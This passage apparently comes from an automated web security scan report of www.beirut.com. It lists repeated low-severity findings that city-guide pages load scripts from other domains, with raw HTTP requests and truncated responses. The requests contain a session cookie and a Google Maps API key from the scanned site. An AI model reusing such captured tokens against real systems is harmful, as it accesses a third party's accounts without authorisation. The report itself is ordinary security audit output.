<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.583. http://www.beirut.com/Movies/Cinemas/Dunes/1083 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Dunes/1083

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Dunes/1083 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:45:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.584. http://www.beirut.com/Movies/Cinemas/Grand-Cinemas-ABC/1087 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Cinemas-ABC/1087

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Grand-Cinemas-ABC/1087 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:58:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.585. http://www.beirut.com/Movies/Cinemas/Grand-Concorde/1086 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Grand-Concorde/1086

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Grand-Concorde/1086 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:48:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.586. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Metropolis-Empire-Sofil/1085 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:46:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.587. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Movies/Cinemas/Sodeco/1084

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies/Cinemas/Sodeco/1084 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:46:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.588. http://www.beirut.com/Museums/14 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Museums/14

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Museums/14 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:33:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.589. http://www.beirut.com/Nightlife/Downtown/I-Bar/67 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Downtown/I-Bar/67

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Downtown/I-Bar/67 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:39:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.590. http://www.beirut.com/Nightlife/Gemmayzeh/Godot/85 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Gemmayzeh/Godot/85

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Gemmayzeh/Godot/85 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:39:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.591. http://www.beirut.com/Nightlife/Gemmayzeh/Joe-Penas/91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Gemmayzeh/Joe-Penas/91

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Gemmayzeh/Joe-Penas/91 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:38:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.592. http://www.beirut.com/Nightlife/Hamra/Li-Beirut/1885 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Hamra/Li-Beirut/1885

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Nightlife/Hamra/Li-Beirut/1885 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:39:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
<script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw" type="text/javascript"></script>
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.593. http://www.beirut.com/Nightlife/Karantina/The-Library/113 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Nightlife/Karantina/The-Library/113

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
